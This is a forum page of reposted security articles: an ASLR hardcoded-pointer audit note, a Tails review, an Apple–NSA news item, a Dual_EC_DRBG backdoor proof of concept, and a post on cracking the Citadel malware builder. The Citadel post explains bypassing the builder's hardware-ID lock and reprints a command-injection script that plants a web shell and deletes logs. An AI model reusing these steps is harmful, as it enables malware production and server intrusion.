Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. [h=3]Hardcoded Pointers[/h]Use of hardcoded pointer could enable the attacker to bypass ASLR. In this draft I'm describing potential methods to find a hardcoded pointer in your target. When exploiting particular vulnerabilities it is fundamental to read/write or jump to predictable memory location in the process' address space. ASLR randomizes the memory locations of various key locations including addresses of libraries. Even though we see that some high profile applications still load libraries with ASLR disabled, we have high hopes they will fix the problem soon. That wouldn't solve the problem overall though. Applying ASLR to all libraries does not mean there is not easily predictable locations in the process' address space. There are API functions that accept address to allocate memory at that address. These functions can be used to hardcode memory address, and so to assign a fixed address to a pointer (CWE-587). As a consequence, it gives an attacker a chance to read/write or jump to known address to bypass ASLR. For these functions you can specify the desired starting address that you want to allocate. When doing security audit it's worth checking if the functions are called with hardcoded addresses. VirtualAlloc VirtualAllocEx VirtualAllocExNuma MapViewOfFileEx MapViewOfFileExNuma The following functions accept address to read as parameter. These are not appear to be useful but leave them for potential future use. UnmapViewOfFile, WriteProcessMemory, ReadProcessMemory, FlushViewOfFile, FlushInstructionCache, Toolhelp32ReadProcessMemory, GetWriteWatch, ResetWriteWatch, ReadProcessMemoryProc64, VirtualUnlock, MapUserPhysicalPages, VirtualProtect, VirtualProtectEx, VirtualQueryEx, GetFrameSourceAddress, CompareFrameDestAddress, VirtualFree, VirtualFreeEx, FindNextFrame, WSPStringToAddress, CompareAddresses, AddressToString It's also worth checking if the application you audit uses shared memory as some application map the memory at fixed address, and even boost library supports the use of this insecure method. The use of relative pointers is less efficient than using raw pointers, so if a user can succeed mapping the same file or shared memory object in the same address in two processes, using raw pointers can be a good idea. To map an object in a fixed address, the user can specify that address in the mapped region's constructor: mapped_region region ( shm //Map shared memory , read_write //Map it as read-write , 0 //Map from offset 0 , 0 //Map until the end , (void*)0x3F000000 //Map it exactly there ); When auditing source code for hardcoded address it's worth looking for constant starting with 0x ending with 0000 as some might indicate hardcoded memory address. I wrote a simple batch script for that. The another batch script I have is for binary code. I recommend to use if you don't find a bug using other methods. To use it you need to execute dasmdir.py on the binary file to produce disassembly, and you may run the batch script on it to get the immediate values filtered. This is interesting. Here is an example of someone asking how to allocate memory at fixed address unintentionally making his software less secure. Sursa: Reversing on Windows: Hardcoded Pointers
  2. toolsmith: Tails - The Amnesiac Incognito Live System Privacy for anyone anywhere Prerequisites/dependencies Systems that can boot DVD, USB, or SD media (x86, no PowerPC or ARM), 1GB RAM Introduction “We will open the book. Its pages are blank. We are going to put words on them ourselves. The book is called Opportunity and its first chapter is New Year's Day.” -Edith Lovejoy Pierce First and foremost, Happy New Year! If you haven’t read or heard about the perpetual stream of rather incredible disclosures continuing to emerge regarding the NSA’s activities as revealed by Edward Snowden, you’ve likely been completely untethered from the Matrix or have indeed been hiding under the proverbial rock. As the ISSA Journal focuses on Cyber Security and Compliance for the January 2014 issue, I thought it a great opportunity to weave a few privacy related current events into the discussion while operating under the auspicious umbrella of the Cyber Security label. The most recent article that caught my attention was Reuters reporting that “as a key part of a campaign to embed encryption software that it could crack into widely used computer products, the U.S. National Security Agency arranged a secret $10 million contract with RSA, one of the most influential firms in the computer security industry.” The report indicates that RSA received $10M from the NSA in exchange for utilizing the agency-backed Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG) as its preferred random number algorithm, an allegation that RSA denies in part. In September 2013 the New York Times reported that an NSA memo released by Snowden declared that “cryptanalytic capabilities are now coming online…vast amounts of encrypted Internet data which have up till now been discarded are now exploitable." Ars Technica’s Dan Goodin described Operation Bullrun as a “a combination of ‘supercomputers, technical trickery, court orders, and behind-the-scenes persuasion’ to undermine basic staples of Internet privacy, including virtual private networks (VPNs) and the widely used secure sockets layer (SSL) and transport layer security (TLS) protocols.” Finally, consider that, again as reported by DanG, a senior NSA cryptographer, Kevin Igoe, is also the co-chair of the Internet Engineering Task Force’s (IETF) Crypto Forum Research Group (CFRG). What could possibly go wrong? According to Dan, Igoe's leadership had largely gone unnoticed until the above mentioned reports surfaced in September 2013 exposing the role NSA agents have played in "deliberately weakening the international encryption standards adopted by developers." I must admit I am conflicted. I believe in protecting the American citizenry above all else. The NSA claims that their surveillance efforts have thwarted attacks against America. Regardless of the debate over the right or wrong of how or if this was achieved, I honor the intent. Yet, while I believe Snowden’s actions are traitorous, as an Internet denizen I can understand his concerns. The problem is that he swore an oath to his country, was well paid to honor it, and then violated it. Regardless of my take on these events and revelations, my obligation to you is to provide you with tooling options. The Information Systems Security Association (ISSA) is an international organization of information security professionals and practitioners. As such, are there means by which our global readership can better practice Internet privacy and security? While there is no panacea, I propose that the likes of The Amnesiac Incognito Live System, or Tails, might contribute to the cause. Again, per the Tails team themselves: “Even though we're doing our best to offer you good tools to protect your privacy while using a computer, there is no magic or perfect solution to such a complex problem.” That said, Tails endeavors to help you preserve your privacy and anonymity. Tails documentation is fabulous; you would do well to start with a full read before using Tails to protect your privacy for the first time. Tails Tails, a merger of the Amnesia and Incognito projects, is a Debian 6 (Squeeze) Linux distribution that works optimally as a live instance via DVD, USB, or SD media. Tails seeks to provide online anonymity and censorship circumvention with the Tor anonymity network to protect your privacy online. All software is configured to connect to the Internet through Tor and if an application tries to connect to the Internet directly, the connection is automatically blocked for security purposes. At this point the well informed amongst you are likely uttering a “whiskey tango foxtrot, Russ, in October The Guardian revealed that the NSA targeted the Tor network.” Yes, true that, but it doesn’t mean that you can’t safely use Tor in a manner that protects you. This is a great opportunity however to direct you to the Tails warning page. Please read this before you do anything else, it’s important. Schneier’s Guardian article also provides nuance. “The fact that all Tor users look alike on the internet, makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.” Getting under way with Tails is easy. Download it, burn it to your preferred media, load the media into your preferred system, and boot it up. I prefer using Tails on USB media inclusive of a persistence volume, just remember to format the USB media in a manner that leaves room to create the persistent volume. When you boot Tails, the first thing you’ll see, as noted in Figure 1 is the Tails Greeter which offers you More Options. Selecting Yes leads you to the option to set an administrative password (recommended) as well as Windows XP Camouflage mode (makes Tails look like Windows XP when you may have shoulder surfers). [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]FIGURE 1: Tails Greeter[/TD] [/TR] [/TABLE] You can also boot into a virtual machine, but there are some specific drawbacks to this method (the host operating system and the virtualization software can monitor what you are doing in Tails). However Tails will warn you as seen in Figure 2. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]FIGURE 2: Tails warns regarding a VM and confirms Tor[/TD] [/TR] [/TABLE] Tor You’ll also note in Figure 2 that TorBrowser (built on Iceweasel, a Firefox alternative) is already configured to use Tor, including the Torbutton, as well as NoScript, Cookie Monster, and Adblock Plus add-ons. There is one Tor enhancement to consider that can be added during the boot menu sequence for Tails where you can interrupt the boot sequence with Tab, hit Space, and then add bridge to enable Tor Bridge Mode. According to the Tor Project, bridge relays or bridges for short are Tor relays that aren't listed in the main Tor directory. As such, even if your ISP is filtering connections to all known Tor relays, they probably won't be able to block all bridges. If you suspect access to the Tor network is being blocked, consider use of the Tor bridge feature as supported fully by Tails when booting in bridge mode. Control Tor with Vidalia which is available via the onion icon the notification area found in the upper right area of the Tails UI. One last note on Tor use as already described on the Tails Warning page you should have already read. Your Tor use is only as good as your exit node. Remember, “Tor is about hiding your location, not about encrypting your communication.” Tor does not, and cannot, encrypt the traffic between an exit node and the destination server. Therefore, any Tor exit node is in a position to capture any traffic passing through it and you should thus use end-to-end encryption for all communications. Be aware that Tails also offers I2P as an alternative to Tor. Encryption Options and Features HTTPS Everywhere is already configured for you in Tor Browser. HTTPS Everywhere uses a ruleset with regular expressions to rewrite URLs to HTTPS. Certain sites offer limited or partial support for encryption over HTTPS, but make it difficult to use where they may default to unencrypted HTTP, or provide hyperlinks on encrypted pages that point back to the unencrypted site. You can use Pidgin for instant messaging which includes OTR or off-the-record encryption. Each time you start Tails you can count on it to generate a random username for all Pidgin accounts. If you’re afraid the computer you’ve booted Tails on (a system in an Internet café or library) is not trustworthy due to the like of a hardware keylogger, you can use the Florence virtual keyboard, also found in the notification area as seen in Figure 3. [TABLE=align: center] [TR] [TD][/TD] [/TR] [TR] [TD]FIGURE 3: The Tails virtual keyboard[/TD] [/TR] [/TABLE] If you’re going to create a persistent volume (recommended) when you use Tails from USB media, do so easily with Applications | Tails | Configure persistent volume. Reboot, then be sure to enable persistence with the Tails Greeter. You will need to setup the USB stick to leave unused space for a persistent volume. You can securely wipe files and cleanup available space thereafter with Nautilus Wipe. Just right click a file or files in the Nautilus file manager and select Wipe to blow it away…forever…in perpetuity. KeePassX is available to securely manage passwords and store them on your persistent volume. You can also configure all your keyrings (GPG, Gnome, Pidgin) as well as Claws Mail. Remember, the persistent volume is encrypted upon creation. You can encrypt text with a passphrase, encrypt and sign text with a public key, and decrypt and verify text with the Tails gpgApplet (the clipboard in the notification area). One last cool Tails feature that doesn’t garner much attention is the Metadata Anonymisation app. This is not unlike Informatica 64’s OOMetaExtractor, the same folks who bring you FOCA as described in the March 2011 toolsmith. Metadata Anonymisation is found under Applications then Accessories. This application will strip all of those interesting file properties left in metadata such as author names and date of creation or change. I have used my share of metadata to create a target list for social engineering during penetration tests so it’s definitely a good idea to clean docs if you’re going to publish or share them if you wish to remain anonymous. Figure 4 shows a before and after collage of PowerPoint metadata for a recent presentation I gave. There are numerous opportunities to protect yourself using The Amnesiac Incognito Live System and I strongly advocate for you keeping an instance at the ready should you need it. It’s ideal for those of you who travel to hostile computing environments, as well as for those of you non-US readers who may not benefit from the same level of personal freedoms and protection from censorship that we typically enjoy here in the States (tongue somewhat in cheek given current events described herein). Conclusion Aside from hoping you’ll give Tails a good look and make use of it, I’d like to leave you with two related resources well worth your attention. The first is a 2007 presentation from Dan Shumow and Niels Ferguson of Microsoft titled On the Possibility of a Back Door in the NIST SP800-90 Dual Ec Prng. Yep, the same random number generator as described in the introduction to this column. The second resource is from bettercrypto.org and is called Applied Crypto Hardening. Systems administrators should definitely give this one a read. Enjoy your efforts to shield yourself from watchful eyes and ears and let me know what you think of Tails. Ping me via Twitter via @holisticinfosec or email if you have questions (russ at holisticinfosec dot org). Cheers…until next month. Posted by Russ McRee at 9:58 AM Sursa: HolisticInfoSec: toolsmith: Tails - The Amnesiac Incognito Live System
  3. Apple Says It Has Never Worked With NSA To Create iPhone Backdoors, Is Unaware Of Alleged DROPOUTJEEP Snooping Program Posted yesterday by Matthew Panzarino (@panzer) Apple has contacted TechCrunch with a statement about the DROPOUTJEEP NSA program that detailed a system by which the organization claimed it could snoop on iPhone users. Apple says that it has never worked with the NSA to create any ‘backdoors’ that would allow that kind of monitoring, and that it was unaware of any programs to do so. Here is the full statement from Apple: Apple has never worked with the NSA to create a backdoor in any of our products, including iPhone. Additionally, we have been unaware of this alleged NSA program targeting our products. We care deeply about our customers’ privacy and security. Our team is continuously working to make our products even more secure, and we make it easy for customers to keep their software up to date with the latest advancements. Whenever we hear about attempts to undermine Apple’s industry-leading security, we thoroughly investigate and take appropriate steps to protect our customers. We will continue to use our resources to stay ahead of malicious hackers and defend our customers from security attacks, regardless of who’s behind them. The statement is a response to a report in Der Spiegel Sunday that detailed a Tailored Access Operations (TAO) unit within the NSA that is tasked with gaining access to foreign computer systems in order to retrieve data to protect national security. The report also pointed out a division called ANT that was set up to compile information about hacking consumer electronics, networking systems and more. The story detailed dozens of devices and methods, including prices for deployment, in a catalogue that could be used by the NSA to pick and choose the tools it needed for snooping. The 50-page catalog included a variety of hacking tools that targeted laptops and mobile phones and other consumer devices. Der Spiegel said that these programs were evidence that the NSA had ‘backdoors’ into computing devices that many consumers use. Among these options was a program called DROPOUTJEEP — a program by which the NSA could theoretically snoop on ‘any’ Apple iPhone with ’100% success’. The documents were dated 2008, implying that these methods were for older devices. Still, the program’s detailed capabilities are worrisome. Researcher and hacker Jacob Applebaum — the co-author of the articles, coinciding with a speech he gave at a conference about the programs — pointed out that the ’100% success rate’ claimed by the NSA was worrisome as it implied cooperation by Apple. The statement from the company appears to preclude that cooperation. The program detail indicated that the NSA needed physical access to the devices at the time that the documents were published. It does note that they were working on ‘remote installation capability’ but there’s no indication whether that was actually successful. The program’s other options included physical interdiction of devices like laptops to install snooping devices — but there have been security advances like hardware encryption in recent iPhone models that would make modification of devices much more difficult. Early reports of the DROPOUTJEEP program made it appear as if every iPhone user was vulnerable to this — which simply can’t be the case. Physical access to a device was required which would preclude the NSA from simply ‘flipping a switch’ to snoop on any user. And Apple patches security holes with every version of iOS. The high adoption rate of new versions of iOS also means that those patches are delivered to users very quickly and on a large scale. The jailbreak community, for instance, knows that once a vulnerability has been used to open up the iPhone’s file system for modification, it’s been ‘burned’ and will likely be patched by Apple quickly. And the process of jailbreaking fits the profile of the capabilities the NSA was detailing in its slide. Applebaum’s walked listeners through a variety of the programs including DROPOUTJEEP. He noted that the claims detailed in the slide indicated that either Apple was working with the NSA to give them a backdoor, or the NSA was just leveraging software vulnerabilities to create its own access. The Apple statement appears to clear that up — pointing to vulnerabilities in older versions of iOS that have likely since been corrected. I do also find it interesting that Apple’s statement uses extremely strong wording in response to the NSA program. “We will continue to use our resources to stay ahead of malicious hackers and defend our customers from security attacks,” the statement reads, “regardless of who’s behind them.” Lumping the program in with ‘malicious hackers’ certainly makes a clear point. This year has been an eventful one for NSA spying program revelations. Apple joined a host of large companies that denied that they had been willing participants in the PRISM data collection system — but later revelations of the MUSCULAR program indicated that the NSA could get its hands on data by monitoring internal company server communications anyway. This spurred targets like Google and Yahoo to implement internal encryption. Last month, Apple released its first ever report on government information requests, detailing the number of times domestic and foreign governments had asked it for user information. At the time, it also filed a suit with the U.S. Government to allow it to be more transparent about the number and frequency of those requests. It also began employing a ‘warrant canary’ to warn users of future compliance with Patriot Act information requests. Most recently, Apple joined AOL, Yahoo, Twitter, Microsoft, LinkedIn, Google and Facebook in requesting global government surveillance reform with an open letter. Though the NSA is located in the United States and these programs were largely designed to target ‘foreign threats’, these companies have a global customer base — making protecting user privacy abroad as well as at home just as important. Image Credit: EFF Sursa: Apple Says It Has Never Worked With NSA To Create iPhone Backdoors, Is Unaware Of Alleged DROPOUTJEEP Snooping Program | TechCrunch
  4. [h=1]Dual_EC_DRBG backdoor: a proof of concept[/h] [h=2]What’s this ?[/h] Dual_EC_DRBG is an pseudo-random number generator promoted by NIST in NIST SP 800-90A and created by NSA. This algorithm is problematic because it has been made mandatory by the FIPS norm (and should be implemented in every FIPS approved software) and some vendors even promoted this algorithm as first source of randomness in their applications. edit: I’ve been told it’s not the case anymore in FIPS-140-2 but the cat is already out of the bag If you still believe Dual_EC_DRBG was not backdoored on purpose, please keep reading. In 2007 already, Dan Shumow and Niels Ferguson from Microsoft showed that Dual_EC_DRBG algorithm could be backdoored. Twitter also uncovered recently that this algorithm was even patented in 2004 by Dan Brown (Not the Da Vinci guy, the Certicom one) as a “key escrow mechanism” (government jargon for trapdoor/backdoor). I will go a little bit further in explaining how it works and give a proof-of-concept code, based on OpenSSL FIPS. This is in the best of my knowledge the only public proof of concept published today. (correct me if I’m wrong). [h=2]Dual_EC_DRBG in a nutshell[/h] The PRNG works as following: it takes a seed that goes through a hashing algorithm. This data is then “fed” into two Elliptic Curve points, P and Q, before being slightly transformed and output. In order to understand how the algorithm (and the backdoor) works, let’s see the relevant maths from Elliptic Curves: [h=3]Elliptic curves[/h] Many types of elliptic curves exist. They are classified in function of their properties and equations. We’re going to see here the curve NIST-p256 which is one of the three curves being used by Dual_EC_DRBG. NIST-p384 and NIST-p521 have very similar characteristics. I’ll try to (poorly) give you the basic theoretics for EC, but I’m no mathematician. Please forgive me and correct me if I’m wrong. A curve is a set of points that follow a group structure. The curve is defined over several parameters (for NIST GFp curves): Equation: all the members of that group (called points) must satisfy this equation Prime modulus p: a prime number used to define the finite field Z/pZ in which the equation elements are defined. The order r: this is the order of the EC and the total number of points into the group. a and b: fixed integers used in curve’s equation. a is set to -3 in NIST GF(p) curves. A Generator point defined by Gx and Gy: This point is considered as the base element of the group. Curve members are points. A point is a pair of coordinates X and Y that satisfy the curve’s equation. They are written as capital letters such as G, P or Q. Points have some characteristics from groups: They have an addition operation (+) defined between two points. (eg. P + Q). This addition is commutative and associative. Since you can add a point with itself as many time as you want, it has a scalar multiplication, which is the multiplication of a scalar (0..n) with a point and results in another point. That scalar multiplication is associative/commutative (a(bP) = b(aP)). This scalar should be in the group of integers modulo r (the order of the curve). The group of Elliptic Curves is very useful in cryptography, because an equation such as iQ = P is very easy to resolve for Q or P (if you know i) but very hard to resolve for i (if all you know is P and Q). This is the Discrete logarithm problem in the EC group. That’s why most of the time the points are used as public parameters/keys and scalars as private counterparts. All NIST curves have different parameters p, r, a, b and points G. These parameters have been constructed from a sha1 hash of a public seed but nobody knows how the seed itself has been chosen. Enough on the theory, let’s study the PRNG ! [h=2]Dual_EC_DRBG internals[/h] Dual_EC_DRBG is defined in NIST SP800-90A page 60. It is an algorithm generating an infinite number of pseudo-random sequences from a single seed, taken in the first step or after an explicit reseed. It is unfortunate that SP800-90A and the presentation from Microsoft use conflicting terminology (variable names). So I will use these variables: : Internal seed value. : External (output) value. You can also see in the document two functions: and . is a function that does a mapping between a large integer and binary data. It doesn’t do much, in fact we can happily ignore it. simply gets the X coordinate of a point, as the X and Y coordinates are mostly redundant (as we’re going to see later). If we unroll the inductive feedback loop on the first two generated outputs, we get this: output(30 least significant bytes of ) output(30 least significant bytes of ) [h=2]An attack[/h] Let’s begin working on and look if we can guess from its content. We can see that is the X coordinate of a point, with 16 bits missing (we lost the 2 most significant bytes in the output process). In a NIST GFp curve, There are for every value of X, zero, one or two points on the curve. So we have at most 17 bits of bruteforce to do to recover the original point A. Let’s work on the hypothesis that we know the point A and it is equal (by definition) to A = . Then the equation: but if we have a (secret) relation between P and Q such as with d = secret number (our backdoor !): multiplicating each side by d (replacing dQ with P) If you look carefully at the unrolled algorithm, you will notice that if we know we can calculate and we have all the required information to calculate subsequent and . All we need to do is to guess a value of A (based on a bruteforce approach), multiply it by the secret value d, then multiply the resulting scalar with Q, strip two bytes and publish the output. It is also very interesting that if we learn (in a practical attack) the first 32 bytes generated by this PRNG, the 30 first bytes give us candidates for A and the remaining two bytes can be used to validate our findings. If the X value had been output on 32 bytes, we would have an one over two chance of success because of the two coexisting points on same coordinate X. (Remember from high school, second degree equations can have two solutions). [h=2]Generating the constants[/h] As you have seen before, for our backdoor to work we need to choose the P and Q points in order to have the secret key to the backdoor. We have chosen to define P = dQ, however, that can’t work, because P is a generator for the EC group and its value has already been fixed. So, we have to find a value e such as Q = eP. This value can be calculated : (mult. by e) We need to find a value e such as ed = 1 for the curve C. The equation to resolve is where r is the order of the EC. The value of e is the inverse of d modulo r. We can then use that value to generate Q. /* 256 bits value randomly generated */unsigned char d[]= "\x75\x91\x67\x64\xbe\x30\xbe\x85\xd1\x50\x09\x19\x50\x8a\xf4\xb5" "\x7a\xc7\x09\x22\x07\x32\xae\x40\xac\x3e\xd5\xfe\x2e\x12\x25\x2a"; d_bn = BN_new(); assert(d_bn != NULL); BN_bin2bn(d, 32, d_bn); /* ensure d is well inside the group order */ EC_GROUP_get_order(curve, r, bn_ctx); BN_mod(d_bn, d_bn, r, bn_ctx); /* calculate Q = d * Generator + (NULL * NULL) */ ret = EC_POINT_mul(curve, my_Q, d_bn, NULL, NULL, bn_ctx); assert(ret == 1); /* calculate e = d^-1 (mod r) */ e_bn = BN_new(); assert(e_bn != NULL); /* invert d to get the value of e */ assert(NULL != BN_mod_inverse(e_bn, d_bn, r, bn_ctx)); (note: I know I mixed up e with d between the code and blog post but that doesn’t change anything at all.) [h=2]Implementation[/h] You can find the proof of concept code on my github. I’ll comment how it works: [h=3]Install OpenSSL/FIPS[/h] Most of the work needed for this POC actually was fighting with OpenSSL FIPS mode (getting it to compile at first) and finding the good APIs to use. OpenSSL FIPS and OpenSSL are two different software that share some codebase. I had to fetch a specific commit of OpenSSL FIPS (one that would compile) and patch it a little to have a few functions from Bignums usable from inside my application. I haven’t been able to mix FIPS and regular libcrypto, because of header incompatibilities (or a bug in my code I though was caused by incompatibilities). The README explains the steps to take (please read it). [h=3]Recover point A[/h] If you remember, we have the 30 least significant bytes of the X coordinate, that means we need to bruteforce our way into A point candidates. This can be easily done in a loop over the 2^16 possibilities. OpenSSL doesn’t provide any way of recovering a point from a single coordinate (there exists a point compression algorithm, but it is so badly patented that it’s not implemented anywhere). We have to resolve the curve’s equation: Resolving such an equation for y is not so different from the equation resolving you learned at high school: for (prefix = 0; prefix <= 0x10000 ; ++prefix){ x_bin[0] = prefix >> 8; x_bin[1] = prefix & 0xff; BN_bin2bn(x_bin, 32, x_value); //bnprint("X value", x_value); /* try to find y such as */ /* y^2 = x^3 - 3x + b (mod p) */ /* tmp1 = x^2 */ ret = BN_mod_mul(tmp1, x_value, x_value, &curve->field, bn_ctx); assert(ret == 1); ret = BN_set_word(tmp2, 3); assert(ret == 1); /* tmp1 = x^2 - 3 */ ret = BN_mod_sub(tmp1, tmp1, tmp2, &curve->field, bn_ctx); assert(ret == 1); /* tmp1 = (x^2 -3) * x */ ret = BN_mod_mul(tmp1, x_value, tmp1, &curve->field, bn_ctx); assert(ret == 1); /* tmp1 = x^3 - 3x + b */ ret = BN_mod_add(tmp1, tmp1, b_bn, &curve->field, bn_ctx); assert(ret == 1); //bnprint("Y squared", tmp1); if (NULL != BN_mod_sqrt(y_value, tmp1, &curve->field, bn_ctx)) { //printf("value %x match !\n", prefix); if(verbose) bnprint("calculated Y", y_value); BN_mod_sub(y_value, zero_value, y_value, &curve->field, bn_ctx); if(verbose) bnprint("calculated Y opposite", y_value); test_candidate(buffer + 30, x_value, y_value, bn_ctx); valid_points += 2; } } I mentioned that for every X, there were zero, one or two solutions: zero if the square root fails (not all elements of Z/pZ are quadratic residues), one if the result is 0 and two for all other answers. There are then two valid points and where is the opposite of the first value modulo p. Explanation (thanks Rod): [h=3]Recover PRNG state and generate next block[/h] This part is pretty straightforward. We import the estimated x and y values, verify that they are in the curve (they should !), then multiply that point with the secret value. We then multiply Q with the resulting scalar and we get 30 bytes of the next output. If the two first bytes match, we have successfully guessed the 28 remaining bytes. That attack can recover everything that’s output by that PRNG till a reseed. /* create the point A based on calculated coordinates x and y */ret = EC_POINT_set_affine_coordinates_GFp(curve, point, x, y, bn_ctx); assert(ret == 1); /* Normally the point should be on curve but we never know */ if (!EC_POINT_is_on_curve(curve, point, bn_ctx)) goto end; /* calculates i2 = phi(x(e.A)) */ ret = EC_POINT_mul(curve, point, NULL, point, e_bn, bn_ctx); assert(ret ==1); ret = EC_POINT_get_affine_coordinates_GFp(curve, point, i2x, NULL, bn_ctx); assert(ret ==1); if(verbose) bnprint ("i2_x", i2x); /* calculate o1 = phi(x(i2 * Q)) */ ret = EC_POINT_mul(curve, point, NULL, my_Q, i2x, bn_ctx); assert(ret == 1); ret = EC_POINT_get_affine_coordinates_GFp(curve, point, o1x, NULL, bn_ctx); if(verbose) bnprint ("o1_x", o1x); BN_bn2bin(o1x, o1x_bin); if (o1x_bin[2] == buffer[0] && o1x_bin[3] == buffer[1]){ printf("Found a match !\n"); bnprint("A_x", x); bnprint("A_y", y); print_hex("prediction", o1x_bin + 4, 28); } [h=3]Let’s run it ![/h] aris@kalix86:~/dualec$ ./dual_ec_drbg_poc s at start of generate: E9B8FBCFCDC7BCB091D14A41A95AD68966AC18879ECC27519403B34231916485 [omitted: many output from openssl] y coordinate at end of mul: 0663BC78276A258D2F422BE407F881AA51B8D2D82ECE31481DB69DFBC6C4D010 r in generate is: 96E8EBC0D507C39F3B5ED8C96E789CC3E6861E1DDFB9D4170D3D5FF68E242437 Random bits written: 000000000000000000000000000000000000000000000000000000000000 y coordinate at end of mul: 5F49D75753F59EA996774DD75E17D730051F93F6C4EB65951DED75A8FCD5D429 s in generate: C64EAF10729061418EB280CCB288AD9D14707E005655FDD2277FC76EC173125E [omitted: many output from openssl] PRNG output: ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437449e Found a match ! A_x: 96e8ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437 A_y: 0663bc78276a258d2f422be407f881aa51b8d2d82ece31481db69dfbc6c4d010 prediction: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3 Reviewed 65502 valid points (candidates for A) PRNG output: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3 Yikes ! [h=2]Conclusion[/h] It is quite obvious in light of the recent revelations from Snowden that this weakness was introduced by purpose by the NSA. It is very elegant and leaks its complete internal state in only 32 bytes of output, which is very impressive knowing it takes 32 bytes of input as a seed. It is obviously complete madness to use the reference implementation from NIST and I’m not the only one to be angry about it. You could use it with custom P and Q values, but that’s very seldom possible. Nevertheless having a whole EC point parameter leaked in the output makes it too easy to distinguish from real random and should never have been made into any specs at all. Let’s all bury that PRNG and the “security” companies bribed by NSA to enable backdoors by default for thirty silver coins. edits: fixed Dan Brown’s employer name, changed a variable name to avoid confusion, fixed counting error 28 bytes to 30 bytes note: I did not break the official algorithm. I do not know the secret value used to compute the Q constant, and thus cannot break the default implementation. Only NSA (and people with access to the key) can exploit the PRNG weakness. Sursa: Dual_Ec_Drbg backdoor: a proof of concept at Aris' Blog - Computers, ssh and rock'n roll
  5. [h=3]How the protection of Citadel got cracked[/h]Recently on a forum someone requested cbcs.exe (Citadel Backconnect Server) If you want to read more about the Backconnect on Citadel, the link that g4m372 shared is cool: Laboratorio Malware: Troyan Citadel BackConnect VNC Server Manager I've searched this file thought downloading a random mirror of the Citadel leaked package in hope to find it inside. Finally the file wasn't on the leaked archive but was already grabbed by various malware trackers. MD5: 50A59E805EEB228D44F6C08E4B786D1E Malwarebytes: Backdoor.Citadel.BkCnct And since i've downloaded the leaked Citadel package... let's see about the Builder. It can be interesting to make a post about it. Citadel.exe: a33fb3c7884050642202e39cd7f177e0 Malwarebytes: Hacktool.Citadel.Builder "ERROR: Builder has been moved to another PC or virtual environment, now it is deactivated." This file is packed with UPX: Same for the Citadel Backconnect Server and the Hardware ID generator. But when we try to unpack it via UPX we have an exception: UPX told us that there is something wrong with the file header, aquabox used a lame trick. With an hexadecimal editor we can clearly see that there is a problem with the DOS Header: We have 0x4D 0x5A ... 00 ... and a size of 0xE8 for the memory. e_lfanew is null, so let's fix it at 18h by 0x40 Miracle: Same tricks for the Hardware ID Calculator and the Citadel Backconnect Server, i will get back on these two files later. Now that we have a clear code we can know the Time/Date Stamp, view the ressources, but more interesting: see how Citadel is protected Viewing the strings already give us a good insight: PHYSICALDRIVE0, Win32_BIOS, Win32_Processor, SerialNumber... But we don't even really need to waste time trying to know how the generation is made. Although you can put a breakpoint at the beginning of the calculation procedure (0x4013F2) At the end, you will be here, this routine will finalise your HID: From another side, you can also have a look on the Hardware ID Calculator. I've got a problem with this file, the first layer was a SFX archive: Malware embedded (stealer): Conclusion: Don't rush on leaked stuff. Alright, now that you have extracted/unpacked the good HID Calculator you can open it in olly. The code is exactly the same as the one you can find on the Citadel Builder, it may help to locate the calculation procedure on the builder although it's really easy to locate it. That was just a short parentheses, to get back on the builder, after that the generation end you will have multiple occasions to view your HID on the stack like here: And the crutial part start here. When the Citadel package of Citab got leaked (see this article for more information) an important file was also released: The HID of the original machine who was running the builder, so you just have to replace your HID by this one, just like this: And this is how the protection of Citadel become super weak and can generate working malwares Now you just have to do a codecave or inject a dll in order to modify it permanently, child game. The problem that every crackers was facing on leaked Citadel builders is to find the good HID key. Citadel builders who was previously leaked wasn't leaked with HID key. e.g: vortex1772_second - 1.3.5.1 And you can't just 'force' the procedure to generate a bot because the Citadel stub is encrypted inside, that why when the package got leaked with the correct HID, a easy way to crack the builder appeared. Without having the good HID you can still bruteforce it till you break the key but this is much harder and time wasting, this solution would be also a more great achievement and respected in scene release. To finish, let's get back on the Citadel backconnect server who was requested on kernelmode.info This script was also leaked with the Citab package: It's for Windows box, and it's super secure... oh wait.. import urllib import urllib2 def request(url, params=None, method='GET'): if method == 'POST': urllib2.urlopen(url, urllib.urlencode(params)).read() elif method == 'GET': if params == None: urllib2.urlopen(url) else: urllib2.urlopen(url + '?' + urllib.urlencode(params)).read() def uploadShell(url, filename, payload): data = { 'b' : 'tapz', 'p1' : 'faggot', 'p2' : 'hacker | echo "' + payload + '" >> ' + filename } request(url + 'test.php', data) def shellExists(url): return urllib.urlopen(url).getcode() == 200 def cleanLogs(url): delete = { 'delete' : '' } request(URL + 'control.php', delete, 'POST') URL = 'http://localhost/citadel/winserv_php_gate/' FILENAME = 'shell.php' PAYLOAD = '<?php phpinfo(); ?>' uploadShell(URL, FILENAME, PAYLOAD) print '[~] Shell created!' if not shellExists(URL + FILENAME): print '[-]', FILENAME, 'not found...' else: print '[+] Go to:', URL + FILENAME cleanLogs(URL) print '[~] Logs cleaned!' Brief, happy new year guys Posted by Steven K at 14:28 Sursa: XyliBox: How the protection of Citadel got cracked
